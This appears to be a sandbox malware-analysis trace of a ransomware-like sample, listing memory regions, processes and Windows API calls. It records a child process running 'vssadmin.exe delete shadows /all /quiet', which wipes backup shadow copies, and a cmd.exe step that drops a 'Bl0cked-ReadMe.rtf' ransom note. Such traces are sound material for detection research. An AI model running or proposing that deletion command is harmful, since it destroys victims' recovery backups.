filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30703 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 30704 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30705 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30706 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 30707 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30708 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 701 os_tid = 0xec8 Process: id = "505" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x7ea16ce0" os_pid = "0xf90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "59" os_parent_pid = "0xe7c" cmd_line = "vssadmin.exe delete shadows /all /quiet" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" 
[0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30709 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30710 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30711 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30712 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 30713 start_va = 0x960000 end_va = 0x97efff entry_point = 0x960000 region_type = mapped_file name = "vssadmin.exe" filename = "\\Windows\\System32\\vssadmin.exe" (normalized: "c:\\windows\\system32\\vssadmin.exe") Region: id = 30714 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30715 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30716 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30717 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 30718 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30731 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000010000" filename = "" Region: id = 30732 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30733 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30734 start_va = 0x1b0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 30735 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 30736 start_va = 0x70370000 end_va = 0x7037ffff entry_point = 0x70370000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 30737 start_va = 0x70380000 end_va = 0x70495fff entry_point = 0x70380000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 30738 start_va = 0x738a0000 end_va = 0x738b3fff entry_point = 0x738a0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 30739 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30740 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 30741 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = 
"\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30742 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 30743 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30744 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 30745 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30746 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30747 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 30748 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30749 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 30750 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 
region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30751 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30752 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 30753 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30754 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30755 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 30756 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 30757 start_va = 0xe0000 end_va = 0xecfff entry_point = 0xe0000 region_type = mapped_file name = "vssadmin.exe.mui" filename = "\\Windows\\System32\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\vssadmin.exe.mui") Region: id = 30758 start_va = 0x130000 end_va = 0x130fff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 30759 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 30760 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 30761 start_va = 0x980000 end_va = 0x157ffff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 30762 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 30763 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 30764 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 30765 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 30766 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 30767 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 30768 start_va = 0x5f0000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 30769 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 30770 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 30771 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 30772 start_va = 0x630000 end_va = 0x8fefff entry_point = 0x630000 region_type = 
mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 30773 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Thread: id = 702 os_tid = 0x9c4 Thread: id = 703 os_tid = 0x130 Thread: id = 704 os_tid = 0xd98 Thread: id = 705 os_tid = 0x80c Thread: id = 706 os_tid = 0x7f4 Process: id = "506" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0x234" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Contacts\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30784 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30785 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30786 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30787 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = 
private name = "private_0x0000000000070000" filename = "" Region: id = 30788 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30789 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30790 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30791 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30792 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 30793 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30828 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30829 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30830 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30831 start_va = 0x1e0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 30832 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000390000" filename = "" Region: id = 30833 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30834 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30835 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30836 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30837 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30838 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30839 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30840 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30841 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x000000007f6f0000" filename = "" Region: id = 30842 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 30843 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30844 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30845 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 30846 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 30847 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 30848 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 30849 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 30850 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 30851 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Thread: id = 708 os_tid = 0x42c [0208.862] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fbe4 | out: lpSystemTimeAsFileTime=0x16fbe4*(dwLowDateTime=0xb14e6a80, dwHighDateTime=0x1d440a9)) [0208.862] GetCurrentProcessId () returned 0x234 [0208.862] GetCurrentThreadId () 
returned 0x42c [0208.862] GetTickCount () returned 0x3ab3c [0208.862] QueryPerformanceCounter (in: lpPerformanceCount=0x16fbdc | out: lpPerformanceCount=0x16fbdc*=26565156037) returned 1 [0208.863] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0208.863] __set_app_type (_Type=0x1) [0208.863] __p__fmode () returned 0x76b331f4 [0208.863] __p__commode () returned 0x76b331fc [0208.863] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0208.863] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0208.863] GetCurrentThreadId () returned 0x42c [0208.863] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x42c) returned 0x38 [0208.863] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0208.863] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0208.863] SetThreadUILanguage (LangId=0x0) returned 0x409 [0208.864] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0208.864] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fb74 | out: phkResult=0x16fb74*=0x0) returned 0x2 [0208.864] VirtualQuery (in: lpAddress=0x16fbab, lpBuffer=0x16fb44, dwLength=0x1c | out: lpBuffer=0x16fb44*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0208.864] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fb44, dwLength=0x1c | out: lpBuffer=0x16fb44*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0208.864] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fb44, dwLength=0x1c | out: 
lpBuffer=0x16fb44*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0208.864] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fb44, dwLength=0x1c | out: lpBuffer=0x16fb44*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0208.864] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fb44, dwLength=0x1c | out: lpBuffer=0x16fb44*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0208.864] GetConsoleOutputCP () returned 0x1b5 [0208.864] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0208.864] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0208.864] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.864] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0208.864] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.864] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0208.864] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.864] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0208.865] _get_osfhandle (_FileHandle=0) returned 0x3 [0208.865] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0208.865] _get_osfhandle (_FileHandle=0) returned 0x3 [0208.865] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0208.865] GetEnvironmentStringsW () returned 0x1f0168* [0208.865] FreeEnvironmentStringsW (penv=0x1f0168) returned 1 [0208.865] GetEnvironmentStringsW () returned 0x1f0168* [0208.865] FreeEnvironmentStringsW (penv=0x1f0168) returned 1 [0208.865] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eae4 | out: 
phkResult=0x16eae4*=0x40) returned 0x0 [0208.865] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x0, lpData=0x16eaf0*=0x90, lpcbData=0x16eae8*=0x1000) returned 0x2 [0208.865] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x4, lpData=0x16eaf0*=0x1, lpcbData=0x16eae8*=0x4) returned 0x0 [0208.865] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x0, lpData=0x16eaf0*=0x1, lpcbData=0x16eae8*=0x1000) returned 0x2 [0208.865] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x4, lpData=0x16eaf0*=0x0, lpcbData=0x16eae8*=0x4) returned 0x0 [0208.866] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x4, lpData=0x16eaf0*=0x40, lpcbData=0x16eae8*=0x4) returned 0x0 [0208.866] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x4, lpData=0x16eaf0*=0x40, lpcbData=0x16eae8*=0x4) returned 0x0 [0208.866] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x0, lpData=0x16eaf0*=0x40, lpcbData=0x16eae8*=0x1000) returned 0x2 [0208.866] RegCloseKey (hKey=0x40) returned 0x0 [0208.866] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eae4 | out: phkResult=0x16eae4*=0x40) returned 0x0 [0208.866] RegQueryValueExW (in: 
hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x0, lpData=0x16eaf0*=0x40, lpcbData=0x16eae8*=0x1000) returned 0x2 [0208.866] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x4, lpData=0x16eaf0*=0x1, lpcbData=0x16eae8*=0x4) returned 0x0 [0208.866] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x0, lpData=0x16eaf0*=0x1, lpcbData=0x16eae8*=0x1000) returned 0x2 [0208.866] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x4, lpData=0x16eaf0*=0x0, lpcbData=0x16eae8*=0x4) returned 0x0 [0208.866] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x4, lpData=0x16eaf0*=0x9, lpcbData=0x16eae8*=0x4) returned 0x0 [0208.866] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x4, lpData=0x16eaf0*=0x9, lpcbData=0x16eae8*=0x4) returned 0x0 [0208.866] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x0, lpData=0x16eaf0*=0x9, lpcbData=0x16eae8*=0x1000) returned 0x2 [0208.866] RegCloseKey (hKey=0x40) returned 0x0 [0208.866] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863aa [0208.866] srand (_Seed=0x5b8863aa) [0208.866] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Contacts\\Bl0cked-ReadMe.rtf\"" 
